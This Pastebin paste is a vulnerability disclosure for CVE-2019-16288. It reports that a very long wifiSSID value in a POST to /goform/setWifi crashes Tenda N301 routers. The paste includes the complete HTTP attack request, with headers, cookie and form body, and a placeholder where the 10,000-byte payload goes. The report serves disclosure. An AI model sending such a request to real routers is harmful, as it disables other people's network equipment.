API tools faq
paste
Advertisement
Guest User

CVE-2019-16288

a guest
Sep 13th, 2019
4,406
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.96 KB | None | 0 0
raw download clone embed print report
  1. CVE-2019-16288
  2.  
  3. > [Description]
  4. > On Tenda N301 wireless routers, a long string in the wifiSSID
  5. > parameter of a goform/setWifi POST request causes the device to crash.
  6. >
  7. > ------------------------------------------
  8. >
  9. > [Additional Information]
  10. > injected 10000 byte payload result of denial of service
  11. >
  12. > ------------------------------------------
  13. >
  14. > [VulnerabilityType Other]
  15. > denial of service (total hardware crash!)
  16. >
  17. > ------------------------------------------
  18. >
  19. > [Vendor of Product]
  20. > https://www.tendacn.com/
  21. >
  22. > ------------------------------------------
  23. >
  24. > [Affected Product Code Base]
  25. > Tenda Wireless router - N301
  26. >
  27. > ------------------------------------------
  28. >
  29. > [Affected Component]
  30. > POST /goform/setWifi HTTP/1.1
  31. > "wifiSSID="
  32. >
  33. > ------------------------------------------
  34. >
  35. > [Attack Type]
  36. > Remote
  37. >
  38. > ------------------------------------------
  39. >
  40. > [Impact Denial of Service]
  41. > true
  42. >
  43. > ------------------------------------------
  44. >
  45. > [Attack Vectors]
  46.  
  47. POST /goform/setWifi HTTP/1.1
  48. Host: 192.168.0.1
  49. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
  50. Accept: */*
  51. Accept-Language: hu-HU,hu;q=0.8,en-US;q=0.5,en;q=0.3
  52. Accept-Encoding: gzip, deflate
  53. Content-Type: application/x-www-form-urlencoded;
  54. Content-Length: 423
  55. Connection: close
  56. Referer: http://192.168.0.1/index.html
  57. Cookie: ecos_pw=MDEyMzQ1Njc41qw:language=cn; bLanguage=en
  58.  
  59. module1=wifiEn&wifiEn=true&module2=wifiBasicCfg&wifiSSID=[10000Byte_Payload here!]&wifiSecurityMode=none&wifiPwd=&wifiHideSSID=false&module7=wifiVirSsid&multiWifiEnable=0&multiWifiSSID=Tenda_Extender&multiWifiPwd=12345678&module3=wifiTime&wifiTimeEn=false&wifiTimeClose=00%3A00-07%3A00&wifiTimeDate=01111100&module4=wifiWPS&wpsEn=false&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&module6=wifiPower&wifiPower=high
  60. > ------------------------------------------
  61. >
  62. > [Reference]
  63. > https://www.tendacn.com
  64.  
  65. Use CVE-2019-16288.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!